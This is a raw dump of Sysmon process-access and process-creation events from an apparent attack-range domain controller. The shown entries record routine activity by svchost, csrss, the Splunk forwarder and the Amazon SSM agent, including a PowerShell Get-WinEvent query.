10341000x80000000000000002249Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002248Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002247Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002246Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002245Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002244Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002243Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002242Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002241Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002240Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-853E-5FCF-0500-000000009101}6442448C:\Windows\system32\csrss.exe{10ACEC4A-8554-5FCF-6000-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002239Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.419{10ACEC4A-8553-5FCF-5700-000000009101}40764072C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{10ACEC4A-8554-5FCF-6000-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4022c|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+403f8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+404c7|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+40fee|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+13671|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+181c6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000002238Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.424{10ACEC4A-8554-5FCF-6000-000000009101}2560C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exe"C:\Program Files\SplunkUniversalForwarder\bin\btool" validate-regex --log-warningsC:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{10ACEC4A-8553-5FCF-5700-000000009101}4076C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000002237Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.414{10ACEC4A-8554-5FCF-5F00-000000009101}30082688C:\Windows\system32\conhost.exe{10ACEC4A-8554-5FCF-5E00-000000009101}2920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002236Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.409{10ACEC4A-853E-5FCF-0500-000000009101}644792C:\Windows\system32\csrss.exe{10ACEC4A-8554-5FCF-5F00-000000009101}3008C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6624|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002235Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.407{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002234Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.407{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002233Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.407{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002232Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.407{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002231Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.407{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002230Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.407{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002229Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.407{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002228Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002227Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.406{10ACEC4A-8540-5FCF-0C00-000000009101}5961120C:\Windows\system32\svchost.exe{10ACEC4A-8551-5FCF-2D00-000000009101}2504C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002226Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.406{10ACEC4A-853E-5FCF-0500-000000009101}644660C:\Windows\system32\csrss.exe{10ACEC4A-8554-5FCF-5E00-000000009101}2920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002225Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.406{10ACEC4A-8551-5FCF-3000-000000009101}15482668C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe{10ACEC4A-8554-5FCF-5E00-000000009101}2920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe+5b01e 154100x80000000000000002224Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.406{10ACEC4A-8554-5FCF-5E00-000000009101}2920C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{10ACEC4A-853F-5FCF-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{10ACEC4A-8551-5FCF-3000-000000009101}1548C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe"C:\Program Files\Amazon\SSM\amazon-ssm-agent.exe" 10341000x80000000000000002223Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.381{10ACEC4A-8554-5FCF-5D00-000000009101}30002508C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE{10ACEC4A-8551-5FCF-3300-000000009101}3080C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e675|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+116e1a6|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f344c|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+f2a91|C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE+19fdb50|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002222Microsoft-Windows-Sysmon/Operationalwin-dc-935.attackrange.local-2020-12-08 13:53:24.117{10ACEC4A-8552-5FCF-4100-000000009101}28042768C:\Windows\system32\conhost.exe{10ACEC4A-8554-5FCF-5D00-000000009101}3000C:\Program Files\SplunkUniversalForwarder\bin\SplunkD.EXE0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 